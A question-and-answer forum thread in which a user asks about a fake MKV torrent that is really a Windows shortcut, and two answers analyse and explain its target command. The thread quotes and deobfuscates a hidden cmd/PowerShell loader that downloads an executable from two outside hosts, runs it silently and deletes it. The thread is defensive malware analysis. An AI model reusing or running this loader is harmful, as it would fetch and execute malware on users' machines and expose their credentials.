-1

I downloaded a torrent that appears to be an MKV file, but when I open the priorities, it shows a shortcut. Under the target, it shows the following command:

%comspec% /v:on/c(set wwe42=%username%.exe&set tnsv=/?931dd7ca2b62dce1=%processor_architecture%&if not exist !wwe42! (set fqdce=powershell -w 1 -c iwr -outf !wwe42! https://&!fqdce!frew.line.pm!tnsv!||!fqdce!j.krq.ch!tnsv!&!wwe42!&del/q !wwe42!))>nul 2>&1

What is it intended to do? Should I be concerned?

Destroy666
  • 12,350
DSol
  • 11

2 Answers2

4

So, you downloaded a file that was supposed to be a MKV file (a video format, known as Matroska Video), but it turned out to be a shortcut. When something like this happens, it is likely that you downloaded a malware instead. It is recommended to just delete it.

Now, to explain what the code does:

%comspec% /v:on /c (set wwe42=%username%.exe & set tnsv=/?931dd7ca2b62dce1=%processor_architecture% & if not exist !wwe42! (set fqdce=powershell -w 1 -c iwr -outf !wwe42! https:// & !fqdce!frew.line.pm!tnsv!||!fqdce!j.krq.ch!tnsv! & !wwe42! & del /q !wwe42!))>nul 2>&1

It is invoking %comspec% with some obfuscated & minified batch script to execute. %comspec% is just an environment variable to %windir%\system32\cmd.exe (Command Prompt).

So, we know that it is just going to run a batch file (and suppress command-line output):

set wwe42=%username%.exe
set tnsv=/?931dd7ca2b62dce1=%processor_architecture%
if not exist !wwe42! (
    set fqdce=powershell -w 1 -c iwr -outf !wwe42! https://
    !fqdce!frew.line.pm!tnsv! || !fqdce!j.krq.ch!tnsv!
    !wwe42!
    del /q !wwe42!
)

So, it downloads an exe file from frew.line.pm/?931dd7ca2b62dce1=%processor_architecture% or j.krq.ch/?931dd7ca2b62dce1=%processor_architecture% (I do not recommend visiting these URLs) and saves it as %username%.exe. It then runs this exe and deletes it.

And yes, it is "dangerous". Just delete it. If you ran the shortcut - you need to scan your system using an installed Anti-Virus software (Windows Defender by default), and it is also recommended to change passwords on most accounts if you ran the shortcut - this program can do anything, including stealing credentials.

winscripter
  • 156
1

It attempts to quietly:

  • send a GET web request with iwr a.k.a. Invoke-WebRequest to some random, obviously suspicious websites, with info about your processor architecture in a parameter
  • store the result in a file named [your_username].exe
  • execute that file
  • delete it with del = permamently

Both domains that are used are online, although I don't see any downloads or responses with harmful content occuring at those specific addresses at this moment.

If you ran it and it was successful, you might be in trouble. In that case, definitely fully scan your system with Microsoft Defender at the very least. See also this.

Destroy666
  • 12,350